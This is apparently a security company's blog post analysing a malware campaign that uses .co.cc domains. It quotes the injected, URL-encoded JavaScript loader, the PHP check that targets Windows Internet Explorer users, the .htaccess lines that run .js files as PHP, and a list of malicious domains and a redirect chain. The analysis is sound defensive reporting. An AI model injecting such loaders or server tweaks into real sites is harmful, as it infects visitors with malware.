Malware update: .co.cc malicious entries

For the last weeks (actually months), we’ve been tracking a large number of malware from .co.cc domains. It seems that every .co.cc domain we find is being used to host either malware or spam.

One of the techniques we are seeing to spread malware is by hiding the .co.cc domain encoded inside a javascript file. Something like this:

Document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2D%61%6E%61%6C%79%74%69%73%63%2E%63%6F%2E%63%63%2F%35%30%22%3E%3C%2F%73%63%72%69%70%74%3E"));

This malware is detected by our scanner as RKS5.

Another interesting thing about this malware is that it is only displayed to users running Windows and Internet explorer, since it has the following check:

<?php $de="HTTP_USER_AGENT“;$ar=$_SERVER[$de];if(stristr($ar,”MSIE“)&&stristr($ar,”Windows“))echo "Document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%77%64%64%2E%63%6F%2E%63%63%2F%34%31%22%3E%3C%2F%73%63%72%69%..74%3E`));”

In addition to that, the .htaccess is modified so that the above PHP code can be executed from inside the javascript file. This is what is added:

AddHandler php5-script .js
AddType application/x-httpd-php .js

On all the affected sites, multiple backdoors are also added to make sure the attackers can remain in control of the site. Multiple domains are being used as intermediaries, all of them hosted at 91.193.194.155 (and are not blacklisted by Google):

http://google-analytisc.co.cc

http://oiwdd.co.cc

http://pojdue.co.cc

The common malware path is: http://pojdue.co.cc/32 -> http://oddwsw.co.cc/info.php?n=32 -> Fake AV (and similars).

If your site is infected with any of those, we can clean it up for you: http://sucuri.net

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.